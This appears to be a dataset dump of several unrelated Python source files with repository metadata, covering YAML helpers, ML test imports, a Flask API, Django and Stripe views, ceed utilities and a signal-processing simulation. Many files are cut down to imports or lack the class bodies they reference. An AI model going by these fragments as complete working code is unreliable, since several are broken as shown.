9fe2e87d337b6c88bd8c4467d12c5b714809bf62 | 1,015 | py | Python | afpy/yml.py | fordaj/afpy | 4fca208a186d276a28e7911210cedb02033237b0 | [
"MIT"
] | null | null | null | afpy/yml.py | fordaj/afpy | 4fca208a186d276a28e7911210cedb02033237b0 | [
"MIT"
] | null | null | null | afpy/yml.py | fordaj/afpy | 4fca208a186d276a28e7911210cedb02033237b0 | [
"MIT"
] | null | null | null |
import yaml
from yaml import Loader, Dumper
from .pathify import * | 30.757576 | 86 | 0.487685 |
9fe326bc9f4e12d04244fe6f4b5e92ea0f66a315 | 88 | py | Python | Algorithm/__init__.py | DSC-Bennett-University/AI-ML-Starter | 5dc411c686a703c37eaf7e88db184cb8972ad2d1 | [
"MIT"
] | 1 | 2021-10-01T05:54:02.000Z | 2021-10-01T05:54:02.000Z | Algorithm/__init__.py | DSC-Bennett-University/AI-ML-Starter | 5dc411c686a703c37eaf7e88db184cb8972ad2d1 | [
"MIT"
] | 7 | 2021-09-21T11:38:50.000Z | 2021-10-06T10:28:11.000Z | Algorithm/__init__.py | DSC-Bennett-University/AI-ML-Starter | 5dc411c686a703c37eaf7e88db184cb8972ad2d1 | [
"MIT"
] | 4 | 2021-09-21T12:08:05.000Z | 2021-10-01T05:54:08.000Z | from .template import template
from .tools import tools
from .LinearReg import LinearReg | 29.333333 | 32 | 0.840909 |
9fe3746b0ca2a17a4da60916603ceccce096325e | 6,994 | py | Python | hypernets/tests/searchers/evolution_test.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | 1,080 | 2020-06-22T07:44:22.000Z | 2022-03-22T07:46:48.000Z | hypernets/tests/searchers/evolution_test.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | 24 | 2020-08-06T02:06:37.000Z | 2022-03-31T03:34:35.000Z | hypernets/tests/searchers/evolution_test.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | 170 | 2020-08-14T08:39:18.000Z | 2022-03-23T12:58:17.000Z | # -*- coding:utf-8 -*-
"""
"""
import numpy as np
from hypernets.core.ops import Identity
from hypernets.core.search_space import HyperSpace, Int, Real, Choice, Bool
from hypernets.core.searcher import OptimizeDirection
from hypernets.searchers.evolution_searcher import Population, EvolutionSearcher
| 39.965714 | 120 | 0.570489 |
9fe3efc076ac50b9a73eb652fb87630b07aba672 | 286 | py | Python | backend/api/api.py | iamdempa/react-flask-postgres-boilerplate-with-docker | f1d74dfa08777ff2aeef3ed2620087855d6e30c3 | [
"Apache-2.0"
] | 67 | 2018-10-02T04:04:15.000Z | 2022-03-30T17:43:56.000Z | backend/api/api.py | iamdempa/react-flask-postgres-boilerplate-with-docker | f1d74dfa08777ff2aeef3ed2620087855d6e30c3 | [
"Apache-2.0"
] | null | null | null | backend/api/api.py | iamdempa/react-flask-postgres-boilerplate-with-docker | f1d74dfa08777ff2aeef3ed2620087855d6e30c3 | [
"Apache-2.0"
] | 30 | 2018-11-21T22:55:08.000Z | 2022-03-01T16:55:53.000Z | from flask import jsonify
from flask_restful import Resource, Api
from .models import Player as PlayerModel, to_dict
api = Api()
api.add_resource(Player, '/')
| 22 | 79 | 0.734266 |
9fe5a28b405ba0411a5720a42bbe49f07b08a96f | 8,697 | py | Python | core/data/collators.py | manzar96/st7 | 8dac6fa3497e5a3594766a232a9e8436120e9563 | [
"MIT"
] | null | null | null | core/data/collators.py | manzar96/st7 | 8dac6fa3497e5a3594766a232a9e8436120e9563 | [
"MIT"
] | null | null | null | core/data/collators.py | manzar96/st7 | 8dac6fa3497e5a3594766a232a9e8436120e9563 | [
"MIT"
] | null | null | null | import torch
from torch.nn.utils.rnn import pad_sequence, pack_padded_sequence
from core.utils.masks import pad_mask, subsequent_mask
from core.utils.tensors import mktensor
| 33.321839 | 77 | 0.609176 |
9fe62e0a759bb38c6001a97c2d2f6695ebbb34cb | 22,748 | py | Python | tests/filesystem_tests.py | d-kiss/fakeos | 88dff667830efe10841df8b3a5f33a581bd94b69 | [
"MIT"
] | 1 | 2017-10-09T10:59:43.000Z | 2017-10-09T10:59:43.000Z | tests/filesystem_tests.py | d-kiss/fakeos | 88dff667830efe10841df8b3a5f33a581bd94b69 | [
"MIT"
] | 5 | 2017-10-06T17:33:37.000Z | 2017-10-13T16:31:34.000Z | tests/filesystem_tests.py | rinslow/fakeos | 88dff667830efe10841df8b3a5f33a581bd94b69 | [
"MIT"
] | null | null | null | import operator
import os as _os
from pathlib import Path
from string import ascii_letters
from itertools import chain, permutations
from functools import reduce
from fakeos import FakeOS
from hypothesis import given, assume, example
from hypothesis.strategies import text, sets, integers, lists, just
from filesystem import FakeDirectory, FakeFile, FakeFilesystem, \
FakeFilesystemWithPermissions
from fakeuser import FakeUser, Root
from unittest import TestCase
from operating_system import FakeWindows, FakeUnix
ILLEGAL_NAMES = ("", ".", "..")
| 33.403818 | 86 | 0.583656 |
9fe6a6466ba62d142e4c8d8e39066315eacdcdb4 | 6,129 | py | Python | ceed/utils.py | matham/ceed | 5d32a99a33325b36dbe74d8b0a22e63abc92aab7 | [
"MIT"
] | 1 | 2020-03-02T22:26:44.000Z | 2020-03-02T22:26:44.000Z | ceed/utils.py | matham/ceed | 5d32a99a33325b36dbe74d8b0a22e63abc92aab7 | [
"MIT"
] | null | null | null | ceed/utils.py | matham/ceed | 5d32a99a33325b36dbe74d8b0a22e63abc92aab7 | [
"MIT"
] | 2 | 2020-01-13T19:42:16.000Z | 2020-01-27T14:58:09.000Z | """Utilities
===================
Various tools used in :mod:`ceed`.
"""
import itertools
import pathlib
import re
from collections import deque
from typing import List, Tuple, Any, Union
__all__ = (
'fix_name', 'update_key_if_other_key', 'collapse_list_to_counts',
'get_plugin_modules', 'CeedWithID',
)
# Matches a trailing "-<number>" suffix, e.g. "troll-2" -> ("troll", "2").
_name_pat = re.compile('^(.+)-([0-9]+)$')


def fix_name(name, *names):
    """Return a variant of ``name`` that is unique among all ``names``.

    :Params:

        `name`: str
            The desired name.
        `*names`: iterables of strings
            Each positional argument is an iterable of already-taken names;
            the result is guaranteed not to occur in any of them.

    :returns:

        ``name`` itself when it is already unique, otherwise ``name`` with
        an integer suffix appended (or incremented) until it is unique.

    E.g.::

        >>> fix_name('troll', ['toll', 'foll'], ['bole', 'cole'])
        'troll'
        >>> fix_name('troll', ['troll', 'toll', 'foll'], ['bole', 'cole'])
        'troll-2'
        >>> fix_name('troll', ['troll-2', 'toll', 'foll'], ['bole', 'cole'])
        'troll'
        >>> fix_name('troll', ['troll', 'troll-2', 'toll', 'foll'], \
['bole', 'cole'])
        'troll-3'
    """
    def is_taken(candidate):
        return any(candidate in group for group in names)

    if not is_taken(name):
        return name

    # Peel off an existing "-<number>" suffix so e.g. "troll-2" counts up
    # from 2 instead of becoming "troll-2-2".
    base, counter = name, 2
    match = _name_pat.match(name)
    if match is not None:
        base, suffix = match.groups()
        counter = int(suffix)

    candidate = f'{base}-{counter}'
    while is_taken(candidate):
        counter += 1
        candidate = f'{base}-{counter}'
    return candidate
def update_key_if_other_key(items, key, value, other_key, key_map):
    """Recursively walk ``items`` (dicts, lists and tuples, nested to any
    depth) and rewrite matching dicts in place.

    A dict is rewritten when it maps ``key`` to ``value`` and also contains
    ``other_key``: the value stored under ``other_key`` is then replaced by
    its mapping from ``key_map`` (and left untouched when ``key_map`` has no
    entry for it).
    """
    for element in items:
        if isinstance(element, dict):
            if key in element and element[key] == value and other_key in element:
                current = element[other_key]
                element[other_key] = key_map.get(current, current)
            # Descend into the dict's values to catch nested containers.
            update_key_if_other_key(
                element.values(), key, value, other_key, key_map)
        elif isinstance(element, (list, tuple)):
            update_key_if_other_key(element, key, value, other_key, key_map)
def collapse_list_to_counts(values: list) -> List[Tuple[Any, int]]:
    """Run-length encode ``values``: collapse each run of consecutive equal
    items into a ``(item, count)`` tuple.

    An empty input yields an empty list.

    E.g.::

        >>> collapse_list_to_counts([1, 1, 2, 3, 1, 1, 1, 3])
        [(1, 2), (2, 1), (3, 1), (1, 3), (3, 1)]
    """
    # itertools.groupby groups *consecutive* equal items, which is exactly
    # the run-length semantics the previous hand-rolled loop implemented.
    return [(item, sum(1 for _ in group))
            for item, group in itertools.groupby(values)]
def get_plugin_modules(
        base_package: str, root: Union[str, pathlib.Path]
) -> Tuple[List[str], List[Tuple[Tuple[str, ...], bytes]]]:
    """Takes a package name and it's corresponding root path and returns a
    list of the modules recursively within this package, as well as the
    source files in bytes.

    Only ``*.py``/``*.pyo`` files are considered (when both exist for one
    module, the ``.py`` wins). Although included with the source bytes, the
    ``packages`` list skips any files that start with an underscore (except
    ``__init__`` of course). ``__pycache__`` directories are never descended
    into.

    :returns: ``(packages, files)`` where ``packages`` is a list of dotted
        module names rooted at ``base_package`` and ``files`` is a list of
        ``(path_parts_relative_to_root, file_bytes)`` tuples.
    """
    packages = []
    files = []

    # Breadth-first walk of the package directory tree.
    fifo = deque([pathlib.Path(root)])
    while fifo:
        directory = fifo.popleft()
        relative_dir = directory.relative_to(root)
        directory_mod = '.'.join((base_package,) + relative_dir.parts)
        for item in directory.iterdir():
            if item.is_dir():
                if not item.name == '__pycache__':
                    fifo.append(item)
                continue
            if not item.is_file() or not item.name.endswith(('.py', '.pyo')):
                continue
            # only pick one of pyo/py
            if item.suffix == '.pyo' and item.with_suffix('.py').exists():
                continue

            files.append(
                (relative_dir.parts + (item.name, ), item.read_bytes()))

            if item.name.startswith('_') and item.name != '__init__.py' \
                    and item.name != '__init__.pyo':
                continue

            # Bug fix: the previous ``item.name[:-3]`` only stripped three
            # characters, so ".pyo" files produced broken module names with
            # a trailing dot (e.g. "pkg.mod."). ``stem`` strips the whole
            # suffix for both ".py" and ".pyo".
            name = item.stem
            if name == '__init__':
                package = directory_mod
            else:
                package = f'{directory_mod}.{name}'
            packages.append(package)

    return packages, files
| 32.775401 | 81 | 0.565019 |
9fe8653449fbc6e6fa94b10d1d0a857bd0455ebf | 2,341 | py | Python | gumroad_clone/users/views.py | AlexanderTCHK/gumroad-clone | 39654243e581b918569772e410196557f71f6591 | [
"MIT"
] | 1 | 2022-01-22T13:43:30.000Z | 2022-01-22T13:43:30.000Z | gumroad_clone/users/views.py | AlexanderTCHK/gumroad-clone | 39654243e581b918569772e410196557f71f6591 | [
"MIT"
] | null | null | null | gumroad_clone/users/views.py | AlexanderTCHK/gumroad-clone | 39654243e581b918569772e410196557f71f6591 | [
"MIT"
] | null | null | null | import stripe
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from django.views.generic import DetailView, RedirectView, UpdateView, TemplateView
from stripe.api_resources import account_link
User = get_user_model()
stripe.api_key = settings.STRIPE_SECRET_KEY
user_detail_view = UserDetailView.as_view()
user_update_view = UserUpdateView.as_view()
user_redirect_view = UserRedirectView.as_view() | 29.2625 | 83 | 0.720632 |
9fe92dc5882b9ab766bfa49539001ca33aa51f84 | 510 | py | Python | chapter1/quest1_4.py | mag6367/Coding_the_Coding_Interview_Python_Solutions | 1d97d18d3d9732c25626e20cb3561ce4241b16e8 | [
"MIT"
] | 1 | 2017-04-28T13:52:13.000Z | 2017-04-28T13:52:13.000Z | chapter1/quest1_4.py | mag6367/Cracking_the_Coding_Interview_Python_Solutions | 1d97d18d3d9732c25626e20cb3561ce4241b16e8 | [
"MIT"
] | null | null | null | chapter1/quest1_4.py | mag6367/Cracking_the_Coding_Interview_Python_Solutions | 1d97d18d3d9732c25626e20cb3561ce4241b16e8 | [
"MIT"
] | null | null | null | # question 1.4 from cracking the code interview 4th ed.
'''
Write a method to decide if two strings are anagrams or not.
'''
# if we sort the two string, they should be the same
| 24.285714 | 60 | 0.727451 |
9febad62a52cd187ba14dbd7516dbb4c9c77a4fc | 2,516 | py | Python | firmware/measure_magnitude.py | mfkiwl/OpenXcvr | 9bea6efd03cd246f16982f0fadafed684ac5ce1c | [
"MIT"
] | 14 | 2020-02-16T15:36:31.000Z | 2022-03-27T02:24:40.000Z | firmware/measure_magnitude.py | mfkiwl/OpenXcvr | 9bea6efd03cd246f16982f0fadafed684ac5ce1c | [
"MIT"
] | 1 | 2020-11-23T16:16:33.000Z | 2020-11-23T16:16:33.000Z | firmware/measure_magnitude.py | mfkiwl/OpenXcvr | 9bea6efd03cd246f16982f0fadafed684ac5ce1c | [
"MIT"
] | 4 | 2021-03-29T16:55:03.000Z | 2022-01-23T16:43:59.000Z | from baremetal import *
from baremetal.signed import number_of_bits_needed
from settings import Settings
from math import log, pi
from matplotlib import pyplot as plt
import numpy as np
import sys
from math import log, ceil
from numpy import log10
#settings for 100KS/s
# hang attack decay
# fast 10000(100ms) 4(1ms) 10(62.5ms)
# med 25000(250ms) 4(1ms) 12(250ms)
# slow 100000(1s) 4(1ms) 13(500ms)
# long 200000(2s) 4(1ms) 15(2s)
# Behavioural simulation entry point: run with "sim" on the command line to
# exercise measure_magnitude against a burst stimulus and plot the response.
# NOTE(review): `measure_magnitude` and the HDL primitives (Clock, Signed,
# Boolean, Settings) are defined elsewhere in this project; their exact
# semantics are assumed from usage here.
if __name__ == "__main__" and "sim" in sys.argv:

    settings = Settings()
    settings.agc_frame_size = 100
    settings.agc_frames = 4

    clk = Clock("clk")
    data_in = Signed(16).input("data_in")
    stb_in = Boolean().input("stb_in")
    magnitude = measure_magnitude(clk, data_in, stb_in, 0, 0)

    # Stimulus: a burst of 1000 samples at amplitude 100 followed by 20000
    # samples of silence, to observe attack and decay behaviour.
    stimulus = []
    for i in range(1000):
        stimulus.append(100)
    for i in range(20000):
        stimulus.append(0)
    response = []

    #simulate
    clk.initialise()
    i = 0
    for data in stimulus:
        data_in.set(data)
        # Two clock ticks per sample: strobe is asserted only on the second
        # tick, and the magnitude output is sampled while it is asserted.
        for i in range(2):
            stb_in.set(i==1)
            if i==1:
                response.append(magnitude.get())
            clk.tick()
        # NOTE(review): the outer counter `i` is clobbered by the inner
        # `for i in range(2)` loop, so this increment does not track sample
        # count -- it looks like dead code; confirm before removing.
        i+=1

    response = np.array(response)

    plt.plot(response)
    plt.plot(stimulus)
    plt.show()
| 30.313253 | 131 | 0.65779 |
9fec2b87298b7ce1d8fa49d924c18e361c3fbd3b | 737 | py | Python | chpt6/Palindrome.py | GDG-Buea/learn-python | 9dfe8caa4b57489cf4249bf7e64856062a0b93c2 | [
"Apache-2.0"
] | null | null | null | chpt6/Palindrome.py | GDG-Buea/learn-python | 9dfe8caa4b57489cf4249bf7e64856062a0b93c2 | [
"Apache-2.0"
] | 2 | 2018-05-21T09:39:00.000Z | 2018-05-27T15:59:15.000Z | chpt6/Palindrome.py | GDG-Buea/learn-python | 9dfe8caa4b57489cf4249bf7e64856062a0b93c2 | [
"Apache-2.0"
] | 2 | 2018-05-19T14:59:56.000Z | 2018-05-19T15:25:48.000Z |
# This program prompts a user to enter an integer and reports whether the integer is a palindrome or not
# A number is a palindrome if its reversal is the same as itself.
main() | 23.03125 | 104 | 0.679783 |
9fec53592de30b9286e20a972b9d6a2e491fec66 | 89 | py | Python | refugee/apps.py | poiedk/refugge_app | 95299005a3fac1ae92cf700d8d52e884c1d17033 | [
"MIT"
] | 1 | 2020-06-07T15:48:34.000Z | 2020-06-07T15:48:34.000Z | refugee/apps.py | poiedk/refuggeapp | 95299005a3fac1ae92cf700d8d52e884c1d17033 | [
"MIT"
] | 1 | 2020-06-05T20:15:54.000Z | 2020-06-05T20:15:54.000Z | refugee/apps.py | poiedk/refuggeapp | 95299005a3fac1ae92cf700d8d52e884c1d17033 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 14.833333 | 33 | 0.752809 |